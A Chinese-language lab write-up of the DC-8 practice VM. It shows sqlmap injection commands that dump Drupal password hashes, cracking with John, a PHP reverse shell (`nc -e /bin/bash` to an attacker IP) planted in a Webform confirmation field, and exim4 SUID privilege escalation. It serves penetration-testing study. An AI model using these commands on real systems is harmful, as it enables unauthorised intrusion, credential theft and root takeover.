DC-8靶机
文章目录
- DC-8靶机
- 信息收集
- web渗透
- 获取权限
- 权限提升
- 靶机总结
信息收集
1.nmap扫描出主机IP为192.168.78.156 开放80和22端口,没扫出来什么漏洞,但是发现robots.txt文件,给出了后台登录地址/usr/login
web渗透
1.登陆到主页发现是drupal框架,使用nmap也没扫出来什么,通过点击不同的页面,似乎发现了SQL注入的地方,点击下面的小标签返回了nid=2
2.使用手工测试一下是否存在注入点,输入’返回了mysql数据库的错误,发现有
3.接下来测试是字符注入还是数字型注入,'#和 and 1=1,确定是数字型注入
4.使用SQLmap对注入点进行进行注入攻击测试`
python sqlmap.py -u http://192.168.78.156/?nid=2 -dbms mysql -batch -dbs
5.进行继续获取表,数据,直到读取了账号和密码paylaod为
python sqlmap.py -u http://192.168.78.156/?nid=2 -dbms mysql -batch -D d7db -T users -C name,pass -dump
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
6.很明显提示出了使用john进行密码破解,将密码保存到文件中,使用john破解hash得到相应的账密 john / turtle
7.尝试进行ssh登录发现失败,去访问/usr/login页面,输入获得的账密登录到后台
获取权限
1.来到后台目录,尝试找到可以修改页面代码的功能,而且还能解析php的功能
2.根据尝试,找到提交反馈意见的界面,输入信息提交之后会显示提示语,而且该模块能自己编写提示语,还能写入php语言
3.在该界面,点击edit,找到WEBFORM处可以编辑并执行PHP代码
4.直接在界面写入反弹shell的php代码
<?php
system("nc -e /bin/bash 192.168.78.145 7777");
?>
5.将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,继续来到contact界面,联系随便填入联系表单,点击发送,触发PHP代码
6.来到kali主机上,查看监听的本地端口已经反弹回来了shell
权限提升
1.进入到shell尝试很多方法,寻找home目录文件有无信息,sudo -l有没有提权,/etc/passwd和/etc/sudoers的权限,查看了密码文件查看用户只有dc8user
2.使用suid提前尝试一下
find / -user root -perm -4000 -print 2>/dev/null
3.发现了老朋友exim4,前面就利用这个漏洞成功提过权,直接wget进行下载POC。一开始下载失败,发现是权限不够,应该是目录的问题,来到tmp文件下。
4.一开始直接执行发现提权失败,使用./1.sh -m netcat命令发现才可以提权,使用id查看成功提权到了root
5.进行读取flag文件,但是读取没一会发现权限就掉回去了,不太稳定捏
靶机总结
- 本次靶机的关键点就在于web界面的SQL注入能否发现了
- 多尝试点击点击页面,查看url数据可能会发现SQL注入的注入点
- 测试注入点成功,可以直接使用sqlmap进行注入点攻击
- john 破解 hash密码
- drupal的网站后台来到contact的WEBFORM功能可以写入php代码进行反弹shell的操作
- 提权方式还是依旧的几种,本次的exim4提权,需要使用提权代码
./1.sh -m netcat,增加了一个参数
